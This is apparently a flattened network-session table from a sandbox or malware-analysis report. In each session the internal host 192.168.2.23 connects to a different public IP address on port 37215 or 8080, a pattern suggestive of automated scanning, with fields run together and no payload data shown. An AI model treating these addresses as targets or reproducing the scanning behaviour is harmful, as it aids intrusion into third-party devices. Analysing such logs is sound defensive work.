                                                        11525192.168.2.233777241.167.64.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11526192.168.2.2333084157.215.163.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11527192.168.2.2335250130.125.227.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11528192.168.2.235497641.121.129.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11529192.168.2.2354078197.230.24.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11530192.168.2.2336346157.236.209.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11531192.168.2.2334374197.111.28.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11532192.168.2.2355232197.58.161.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11533192.168.2.2333006124.10.200.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11534192.168.2.233862280.14.58.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11535192.168.2.2354448157.50.143.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11536192.168.2.2357914157.10.118.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11537192.168.2.2352126197.71.162.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11538192.168.2.235504061.0.129.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11539192.168.2.2350078197.252.206.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11540192.168.2.2340552197.35.236.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11541192.168.2.235835641.246.201.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11542192.168.2.2345526197.168.151.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11543192.168.2.2347938197.174.131.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11544192.168.2.2333782197.78.154.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11545192.168.2.2344388126.172.27.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11546192.168.2.2348226197.85.224.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11547192.168.2.2338986197.24.118.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11548192.168.2.2339682157.52.55.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11549192.168.2.2359462126.244.115.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11550192.168.2.2340020197.161.164.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11551192.168.2.2349082197.188.147.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11552192.168.2.234174041.44.70.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11553192.168.2.2356958157.1.193.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11554192.168.2.2348952197.89.133.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11555192.168.2.233508241.178.198.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11556192.168.2.234523241.92.208.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11557192.168.2.2360540157.68.109.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11558192.168.2.2359544208.109.140.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11559192.168.2.2356066197.174.81.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11560192.168.2.2345126157.15.28.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11561192.168.2.2335786197.1.157.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11562192.168.2.2355054157.7.72.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11563192.168.2.2336578197.135.1.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11564192.168.2.2360634197.184.79.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11565192.168.2.2345570207.49.38.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11566192.168.2.2345892119.26.125.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11567192.168.2.2333264178.9.249.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11568192.168.2.2350932197.168.178.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11569192.168.2.2343394197.16.132.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11570192.168.2.234841441.178.45.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11571192.168.2.2333724197.39.234.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11572192.168.2.235379641.93.209.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11573192.168.2.234454841.16.178.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11574192.168.2.2343884157.71.230.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11575192.168.2.2350154197.174.8.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11576192.168.2.2337932197.241.162.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11577192.168.2.2341244157.115.89.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11578192.168.2.2345308197.254.88.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11579192.168.2.2352214157.38.230.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11580192.168.2.2334578197.252.222.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11581192.168.2.2360802104.253.87.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11582192.168.2.2357852197.24.92.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11583192.168.2.2340754157.32.230.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11584192.168.2.2353566197.166.38.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11585192.168.2.233338841.98.5.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11586192.168.2.233750680.19.92.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11587192.168.2.234285276.245.238.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11588192.168.2.235409441.176.37.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11589192.168.2.2334878142.100.121.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11590192.168.2.234996841.229.91.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11591192.168.2.2349558197.120.142.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11592192.168.2.2353890101.176.89.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11593192.168.2.2341274143.31.146.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11594192.168.2.2352614145.96.143.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11595192.168.2.235966241.156.247.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11596192.168.2.234786862.219.87.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11597192.168.2.2355486157.22.79.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11598192.168.2.234836641.227.109.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11599192.168.2.2350830197.201.107.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11600192.168.2.233948441.71.169.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11601192.168.2.234888441.10.147.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11602192.168.2.233616641.215.169.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11603192.168.2.235261841.195.33.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11604192.168.2.233688441.58.19.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11605192.168.2.233314241.28.211.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11606192.168.2.2357206197.157.50.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11607192.168.2.2350346157.82.216.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11608192.168.2.2344354163.237.20.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11609192.168.2.233490241.224.123.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11610192.168.2.2343856197.125.136.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11611192.168.2.2338282157.224.205.16437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11612192.168.2.236062841.194.177.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11613192.168.2.2348788157.137.150.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11614192.168.2.236042673.124.21.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11615192.168.2.2355980206.234.133.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11616192.168.2.2354122197.190.67.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11617192.168.2.233733841.233.204.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11618192.168.2.233960014.175.34.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11619192.168.2.234660465.205.204.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11620192.168.2.2348790184.15.220.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11621192.168.2.235132277.168.37.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11622192.168.2.2353764197.201.206.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11623192.168.2.233936249.197.243.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11624192.168.2.2357018128.103.130.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11625192.168.2.2346548120.192.54.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11626192.168.2.234643896.69.124.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11627192.168.2.23598629.157.181.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11628192.168.2.234325474.179.186.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11629192.168.2.235287637.193.228.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11630192.168.2.234559650.169.134.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11631192.168.2.2350650109.76.230.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11632192.168.2.2346172169.38.172.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11633192.168.2.2342676208.154.246.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11634192.168.2.2360188100.204.101.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11635192.168.2.235499490.68.228.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11636192.168.2.235773464.133.249.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11637192.168.2.234239624.151.5.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11638192.168.2.2347914145.199.48.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11639192.168.2.235423650.248.110.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11640192.168.2.2345072209.132.75.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11641192.168.2.234031077.245.203.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11642192.168.2.2335312135.38.239.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11643192.168.2.2343628109.246.116.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11644192.168.2.234225234.248.90.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11645192.168.2.2351630202.199.227.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11646192.168.2.2334554178.167.8.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11647192.168.2.2339616132.8.60.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11648192.168.2.2355766207.83.217.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11649192.168.2.235685842.70.163.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11650192.168.2.2344930189.170.66.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11651192.168.2.2336708139.58.140.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11652192.168.2.233576873.210.172.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11653192.168.2.2348876156.39.237.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11654192.168.2.2354050218.68.28.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11655192.168.2.234712093.103.199.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11656192.168.2.2343398185.32.143.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11657192.168.2.2344314128.190.171.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11658192.168.2.23505329.155.51.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11659192.168.2.2337014161.74.190.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11660192.168.2.2347030100.139.237.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11661192.168.2.2351116172.134.222.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11662192.168.2.2336398169.4.143.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11663192.168.2.2348058177.183.31.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11664192.168.2.2358206223.9.144.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11665192.168.2.235269838.50.192.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11666192.168.2.235583098.179.170.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11667192.168.2.2341832126.9.25.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11668192.168.2.2334638179.229.153.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11669192.168.2.2345416202.226.97.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11670192.168.2.235985431.25.83.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11671192.168.2.233495847.172.183.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11672192.168.2.2335240217.125.90.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11673192.168.2.234599824.186.128.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11674192.168.2.2353110190.184.254.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11675192.168.2.2351916109.227.47.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11676192.168.2.2347008152.59.17.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11677192.168.2.2360320161.56.201.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11678192.168.2.2345002129.91.160.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11679192.168.2.233860276.208.166.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11680192.168.2.235605875.195.167.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11681192.168.2.234908242.23.82.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11682192.168.2.2338090155.186.4.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11683192.168.2.2345820182.112.223.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11684192.168.2.2338528187.231.6.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11685192.168.2.2353810212.117.94.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11686192.168.2.234388050.40.123.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11687192.168.2.2353880109.138.76.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11688192.168.2.2352022170.104.214.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11689192.168.2.2340288126.202.23.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11690192.168.2.2353038175.100.87.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11691192.168.2.2345464124.242.165.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11692192.168.2.234899870.54.40.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11693192.168.2.2356242115.176.64.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11694192.168.2.235553436.251.130.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11695192.168.2.2334090123.101.44.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11696192.168.2.2340986187.245.162.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11697192.168.2.234755287.230.83.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11698192.168.2.2350844142.13.225.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11699192.168.2.2337024154.56.149.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11700192.168.2.2344440206.246.146.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11701192.168.2.2334032217.103.41.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11702192.168.2.2335486120.20.217.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11703192.168.2.234555077.17.28.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11704192.168.2.2352834151.168.238.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11705192.168.2.2344254189.49.108.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11706192.168.2.2358198136.23.46.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11707192.168.2.2346448174.71.78.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11708192.168.2.2357280130.56.50.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11709192.168.2.2346570184.43.194.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11710192.168.2.233856061.212.97.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11711192.168.2.2337654191.115.201.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11712192.168.2.235415245.247.104.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11713192.168.2.235037425.253.116.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11714192.168.2.234652096.196.198.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11715192.168.2.2343276202.35.112.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11716192.168.2.2335302147.203.202.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11717192.168.2.2357648174.118.133.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11718192.168.2.2357996165.172.147.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11719192.168.2.235654874.16.15.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11720192.168.2.234566035.208.166.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11721192.168.2.2348052167.14.38.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11722192.168.2.234070064.157.153.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11723192.168.2.2359018167.222.134.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11724192.168.2.233867834.23.252.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11725192.168.2.2344556182.230.249.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11726192.168.2.234290071.141.253.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11727192.168.2.2332788114.226.19.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11728192.168.2.23368605.254.182.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11729192.168.2.233976880.253.203.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11730192.168.2.236019492.6.109.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11731192.168.2.2356600138.82.218.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11732192.168.2.233505032.184.50.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11733192.168.2.2334226121.206.214.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11734192.168.2.2339748193.236.31.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
